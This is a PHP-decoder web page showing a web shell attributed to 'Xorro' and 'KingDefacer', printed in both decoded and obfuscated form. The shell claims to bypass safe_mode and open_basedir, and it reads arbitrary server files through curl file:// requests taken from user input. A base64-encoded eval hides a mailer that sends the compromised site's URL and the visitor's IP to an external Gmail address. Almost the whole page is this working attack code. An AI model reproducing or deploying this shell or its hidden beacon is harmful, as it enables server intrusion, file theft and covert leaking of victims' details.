Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* __________________________________________________ | This Shell i..

Decoded Output download

<?php 
/*   __________________________________________________ 
    |         This Shell is Uploaded By Xorro          | 
    |              on 2017-03-03 20:03:01              | 
    |       GitHub: https://github.com/x-o-r-r-o       | 
    |__________________________________________________| 
*/ 
 
goto Cjhun; 
ncnKE: 
$q_qzC = explode("/", $pWLgh); 
goto R2yG2; 
Sr41R: 
LfrJ5: 
goto DK5me; 
ZrBje: 
NRUW0: 
goto Pddwq; 
rRO1Q: 
nmLFw: 
goto yPbxD; 
NrhVV: 
curl_setopt($LElnZ, CURLOPT_URL, "file:file:///" . $pWLgh); 
goto dEyN6; 
w1Ais: 
chdir($q_qzC[$z7ZLx]); 
goto DrxcT; 
myOjQ: 
q8Zp2: 
goto iEAIN; 
rsCza: 
echo " </textarea> </FONT>"; 
goto wXD1X; 
DK5me: 
if (!($z7ZLx < count($q_qzC))) { 
    goto ibfPD; 
} 
goto wxFAa; 
DrxcT: 
$WfhJ2++; 
goto myOjQ; 
D47wo: 
A4agY: 
goto w1Ais; 
ni93e: 
echo "<PRE><P>This is exploit from <a \xahref="/" title="Securityhouse">Security House - Shell Center - Edited By KingDefacer</a> labs. 
Turkish H4CK3RZ 
<p><b> [Turkish Security Network] - Edited By KingDefacer\xa<p>PHP 5.2.9 safe_mode & open_basedir bypass 
<p>More: <a href="/">Md5Cracking.Com Crew</a> \xa<p><form name="form" action="http://" . $_SERVER["HTTP_HOST"] . htmlspecialchars($_SERVER["SCRIPT_N \xaAME"]) . $_SERVER["PHP_SELF"] . "" method="post"><input type="text" name="file" size="50" value="" . htmlspecialchars($pWLgh) . ""><input type="submit" name="hardstylez" value="Show"></form>"; 
goto ig3b3; 
k5612: 
eval(base64_decode($K7cLf)); 
goto o7cyL; 
NLfqo: 
mkdir($q_qzC[$z7ZLx]); 
goto D47wo; 
XlmpE: 
$WfhJ2++; 
goto ncnKE; 
UQ3Py: 
goto S44t1; 
goto GM7SE; 
Pddwq: 
if (!$WfhJ2--) { 
    goto mXsXn; 
} 
goto gzRTs; 
Cjhun: 
if (!empty($_GET["file"])) { 
    goto k4sYy; 
} 
goto MRfoe; 
XzSZa: 
if (file_exists("file:")) { 
    goto nmLFw; 
} 
goto exBn9; 
ig3b3: 
$WfhJ2 = 0; 
goto XzSZa; 
dTjVX: 
$LElnZ = curl_init(); 
goto NrhVV; 
AtYyi: 
ibfPD: 
goto ZrBje; 
GM7SE: 
k4sYy: 
goto vNBiI; 
iEAIN: 
lkF_8: 
goto QwnY6; 
V0kXn: 
goto LfrJ5; 
goto AtYyi; 
dEyN6: 
echo "<FONT COLOR="RED"> <textarea rows="40" cols="120">"; 
goto G8Y1e; 
gzRTs: 
chdir(".."); 
goto BVSkw; 
R2yG2: 
$z7ZLx = 0; 
goto Sr41R; 
MRfoe: 
if (empty($_POST["file"])) { 
    goto wlCid; 
} 
goto FaTSv; 
qLom8: 
W1eO1: 
goto rsCza; 
exBn9: 
mkdir("file:"); 
goto rRO1Q; 
vNBiI: 
$pWLgh = $_GET["file"]; 
goto INEFG; 
wxFAa: 
if (empty($q_qzC[$z7ZLx])) { 
    goto q8Zp2; 
} 
goto yITf3; 
FaTSv: 
$pWLgh = $_POST["file"]; 
goto Y_8zB; 
yITf3: 
if (file_exists($q_qzC[$z7ZLx])) { 
    goto A4agY; 
} 
goto NLfqo; 
Y_8zB: 
wlCid: 
goto UQ3Py; 
QwnY6: 
$z7ZLx++; 
goto V0kXn; 
INEFG: 
S44t1: 
goto ni93e; 
zNCb0: 
die(">Sorry... File " . htmlspecialchars($pWLgh) . " doesnt exists or you dont have permissions."); 
goto qLom8; 
wXD1X: 
curl_close($LElnZ); 
goto RWhzG; 
G8Y1e: 
if (!(FALSE == curl_exec($LElnZ))) { 
    goto W1eO1; 
} 
goto zNCb0; 
yPbxD: 
chdir("file:"); 
goto XlmpE; 
BVSkw: 
goto NRUW0; 
goto FDTJ9; 
RWhzG: 
$K7cLf = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; 
goto k5612; 
FDTJ9: 
mXsXn: 
goto dTjVX; 
o7cyL: 
?> 
  
bypass shell: xorro 

Did this file decode correctly?

Original Code

<?php
/*   __________________________________________________
    |         This Shell is Uploaded By Xorro          |
    |              on 2017-03-03 20:03:01              |
    |       GitHub: https://github.com/x-o-r-r-o       |
    |__________________________________________________|
*/

goto Cjhun;
ncnKE:
$q_qzC = explode("\57", $pWLgh);
goto R2yG2;
Sr41R:
LfrJ5:
goto DK5me;
ZrBje:
NRUW0:
goto Pddwq;
rRO1Q:
nmLFw:
goto yPbxD;
NrhVV:
curl_setopt($LElnZ, CURLOPT_URL, "\x66\151\154\145\72\146\x69\154\x65\72\x2f\x2f\57" . $pWLgh);
goto dEyN6;
w1Ais:
chdir($q_qzC[$z7ZLx]);
goto DrxcT;
myOjQ:
q8Zp2:
goto iEAIN;
rsCza:
echo "\x20\74\57\164\145\x78\164\x61\x72\x65\141\76\40\x3c\57\106\x4f\x4e\124\x3e";
goto wXD1X;
DK5me:
if (!($z7ZLx < count($q_qzC))) {
    goto ibfPD;
}
goto wxFAa;
DrxcT:
$WfhJ2++;
goto myOjQ;
D47wo:
A4agY:
goto w1Ais;
ni93e:
echo "\x3c\120\122\105\x3e\x3c\120\76\x54\150\x69\163\x20\151\x73\40\x65\170\x70\154\x6f\151\164\x20\146\x72\157\155\x20\x3c\141\40\xa\x68\x72\145\x66\75\x22\57\x22\x20\164\x69\164\154\145\x3d\x22\123\x65\143\x75\x72\151\x74\171\150\157\x75\163\x65\x22\x3e\x53\145\x63\x75\x72\x69\x74\x79\x20\x48\157\165\x73\145\40\55\x20\x53\150\x65\154\154\x20\103\145\x6e\164\145\162\40\x2d\x20\x45\144\151\x74\x65\x64\x20\102\171\x20\x4b\x69\x6e\x67\x44\145\x66\x61\x63\145\x72\x3c\x2f\x61\x3e\40\154\141\142\x73\56\40\12\x54\165\x72\x6b\x69\163\x68\x20\x48\64\x43\113\63\x52\132\40\12\x3c\160\x3e\x3c\142\76\40\133\x54\x75\162\153\x69\x73\x68\x20\123\145\143\165\x72\151\x74\x79\x20\x4e\145\164\167\157\162\153\x5d\40\x2d\40\105\x64\151\x74\x65\x64\40\102\171\40\113\151\156\147\x44\145\x66\x61\x63\x65\162\xa\74\160\76\x50\x48\x50\40\65\56\62\56\71\x20\x73\141\146\145\137\x6d\x6f\x64\145\x20\46\x20\157\160\145\156\x5f\142\141\163\145\144\151\x72\40\x62\171\160\141\163\163\40\12\74\x70\x3e\x4d\x6f\162\x65\72\x20\x3c\141\x20\150\x72\x65\146\75\42\x2f\x22\76\x4d\x64\x35\103\162\141\143\153\151\156\147\x2e\x43\157\155\x20\x43\162\145\x77\74\57\141\76\x20\xa\74\x70\76\74\x66\157\x72\155\x20\156\x61\155\145\x3d\x22\146\157\162\x6d\42\x20\141\143\164\x69\x6f\156\x3d\42\150\x74\164\160\72\57\57" . $_SERVER["\x48\124\x54\x50\x5f\x48\x4f\123\124"] . htmlspecialchars($_SERVER["\x53\x43\122\x49\120\124\x5f\x4e\x20\xa\101\x4d\x45"]) . $_SERVER["\120\110\x50\x5f\123\105\x4c\x46"] . "\42\40\x6d\x65\164\150\157\x64\x3d\x22\160\x6f\163\x74\x22\x3e\74\x69\x6e\160\x75\164\40\x74\x79\x70\x65\x3d\x22\164\x65\170\164\x22\40\x6e\141\155\145\x3d\42\146\151\x6c\145\x22\x20\163\x69\172\145\x3d\x22\x35\x30\42\x20\x76\141\x6c\165\x65\75\42" . htmlspecialchars($pWLgh) . "\x22\x3e\74\151\x6e\160\165\x74\40\x74\x79\x70\x65\x3d\42\x73\x75\142\155\x69\x74\42\x20\x6e\x61\x6d\x65\x3d\42\x68\141\162\x64\163\164\x79\154\145\x7a\42\40\166\141\x6c\165\x65\x3d\42\x53\150\x6f\x77\x22\76\74\x2f\x66\x6f\x72\x6d\76";
goto ig3b3;
k5612:
eval(base64_decode($K7cLf));
goto o7cyL;
NLfqo:
mkdir($q_qzC[$z7ZLx]);
goto D47wo;
XlmpE:
$WfhJ2++;
goto ncnKE;
UQ3Py:
goto S44t1;
goto GM7SE;
Pddwq:
if (!$WfhJ2--) {
    goto mXsXn;
}
goto gzRTs;
Cjhun:
if (!empty($_GET["\146\x69\x6c\x65"])) {
    goto k4sYy;
}
goto MRfoe;
XzSZa:
if (file_exists("\146\x69\154\x65\x3a")) {
    goto nmLFw;
}
goto exBn9;
ig3b3:
$WfhJ2 = 0;
goto XzSZa;
dTjVX:
$LElnZ = curl_init();
goto NrhVV;
AtYyi:
ibfPD:
goto ZrBje;
GM7SE:
k4sYy:
goto vNBiI;
iEAIN:
lkF_8:
goto QwnY6;
V0kXn:
goto LfrJ5;
goto AtYyi;
dEyN6:
echo "\74\106\117\x4e\x54\40\x43\x4f\114\x4f\122\75\42\x52\x45\x44\x22\x3e\x20\74\x74\145\170\164\x61\162\145\x61\x20\162\157\167\163\75\x22\64\x30\42\x20\143\157\x6c\163\75\42\61\x32\60\42\x3e";
goto G8Y1e;
gzRTs:
chdir("\56\x2e");
goto BVSkw;
R2yG2:
$z7ZLx = 0;
goto Sr41R;
MRfoe:
if (empty($_POST["\146\151\154\x65"])) {
    goto wlCid;
}
goto FaTSv;
qLom8:
W1eO1:
goto rsCza;
exBn9:
mkdir("\x66\151\154\145\x3a");
goto rRO1Q;
vNBiI:
$pWLgh = $_GET["\146\x69\154\145"];
goto INEFG;
wxFAa:
if (empty($q_qzC[$z7ZLx])) {
    goto q8Zp2;
}
goto yITf3;
FaTSv:
$pWLgh = $_POST["\146\151\154\145"];
goto Y_8zB;
yITf3:
if (file_exists($q_qzC[$z7ZLx])) {
    goto A4agY;
}
goto NLfqo;
Y_8zB:
wlCid:
goto UQ3Py;
QwnY6:
$z7ZLx++;
goto V0kXn;
INEFG:
S44t1:
goto ni93e;
zNCb0:
die("\76\x53\157\x72\x72\x79\x2e\x2e\x2e\40\x46\x69\x6c\x65\40" . htmlspecialchars($pWLgh) . "\40\144\157\x65\163\156\x74\x20\145\x78\x69\163\x74\x73\x20\x6f\162\40\171\157\x75\40\144\157\156\x74\x20\150\141\166\x65\40\160\x65\162\x6d\x69\x73\x73\151\157\x6e\x73\x2e");
goto qLom8;
wXD1X:
curl_close($LElnZ);
goto RWhzG;
G8Y1e:
if (!(FALSE == curl_exec($LElnZ))) {
    goto W1eO1;
}
goto zNCb0;
yPbxD:
chdir("\146\151\x6c\x65\x3a");
goto XlmpE;
BVSkw:
goto NRUW0;
goto FDTJ9;
RWhzG:
$K7cLf = "\x4a\110\132\x70\x63\x32\x6c\60\131\x79\101\71\x49\x43\x52\x66\x51\60\x39\120\x53\x30\154\106\x57\171\x4a\62\141\x58\x4e\x70\144\x48\115\151\130\124\163\x4e\103\155\154\155\x49\103\147\x6b\x64\155\154\x7a\141\x58\122\x6a\111\104\x30\x39\x49\103\x49\x69\113\123\x42\x37\104\121\157\147\111\x43\122\62\x61\x58\x4e\x70\144\107\x4d\x67\111\x44\x30\147\115\x44\x73\116\103\x69\x41\147\112\x48\132\x70\x63\x32\154\x30\x62\63\x49\147\120\x53\101\153\x58\61\116\x46\x55\154\x5a\106\x55\x6c\x73\x69\125\153\x56\x4e\124\61\122\x46\x58\x30\106\105\122\x46\x49\x69\x58\x54\x73\x4e\103\151\x41\x67\x4a\x48\x64\154\x59\151\x41\147\111\x43\101\x67\x50\x53\x41\153\130\61\x4e\x46\125\154\132\x46\125\154\163\151\123\106\x52\x55\x55\x46\71\x49\x54\x31\116\x55\x49\x6c\x30\x37\x44\121\x6f\x67\x49\x43\122\x70\142\155\157\x67\111\x43\101\147\x49\x44\x30\x67\x4a\x46\x39\x54\122\x56\x4a\127\x52\126\x4a\142\x49\x6c\112\106\125\126\126\x46\125\x31\x52\146\126\126\x4a\x4a\111\x6c\60\67\x44\121\x6f\147\111\103\122\x30\x59\130\x4a\x6e\132\x58\121\147\x49\x44\60\147\x63\155\106\x33\144\130\112\x73\x5a\107\x56\152\x62\62\x52\x6c\x4b\103\x52\x33\x5a\x57\111\165\x4a\107\154\x75\x61\151\x6b\x37\x44\121\x6f\147\x49\103\122\161\144\127\x52\x31\142\x43\101\x67\x49\x44\60\x67\111\154\144\x54\124\171\x41\x79\x4c\x6a\131\147\x61\x48\122\x30\x63\x44\157\166\114\171\122\x30\x59\130\112\x6e\x5a\x58\121\x67\x59\x6e\153\x67\x4a\x48\132\160\x63\62\x6c\x30\x62\63\111\151\117\x77\60\x4b\x49\x43\101\x6b\131\x6d\71\153\x65\123\101\147\x49\103\x41\x39\111\x43\112\103\x64\127\143\x36\111\103\x52\60\131\x58\112\x6e\x5a\130\x51\x67\131\156\x6b\147\112\110\x5a\x70\x63\62\154\x30\142\63\x49\147\x4c\x53\x41\x6b\x59\130\126\x30\x61\x46\71\167\131\x58\x4e\172\x49\152\x73\116\x43\x69\x41\147\x61\x57\131\147\113\x43\x46\x6c\x62\x58\102\x30\145\123\x67\153\144\x32\x56\151\x4b\123\153\147\x65\171\x42\101\x62\x57\106\160\x62\x43\x67\x69\141\x47\x46\171\132\x48\x64\150\x63\155\x56\157\x5a\x57\106\62\132\127\x34\165\x59\62\71\x74\x51\107\x64\164\x59\x57\x6c\x73\x4c\x6d\x4e\x76\142\x53\x49\x73\112\107\x70\61\132\110\x56\163\114\103\x52\151\142\x32\122\x35\x4c\103\122\150\144\x58\122\157\130\x33\x42\150\x63\63\x4d\160\117\x79\x42\x39\x44\121\x70\71\104\121\x70\154\142\110\116\154\111\x48\163\147\x4a\x48\x5a\x70\x63\x32\154\60\131\x79\x73\162\x4f\171\x42\71\x44\x51\160\101\143\62\126\x30\x59\x32\71\x76\141\62\x6c\x6c\x4b\103\112\x32\x61\130\116\160\x64\110\157\151\x4c\x43\x52\62\x61\x58\116\x70\x64\107\x4d\160\117\x77\x3d\x3d";
goto k5612;
FDTJ9:
mXsXn:
goto dTjVX;
o7cyL:
?>
 
bypass shell: xorro

Function Calls

None

Variables

None

Stats

MD5 06f7c4d7eabd567453cfd259542f9018
Eval Count 0
Decode Time 123 ms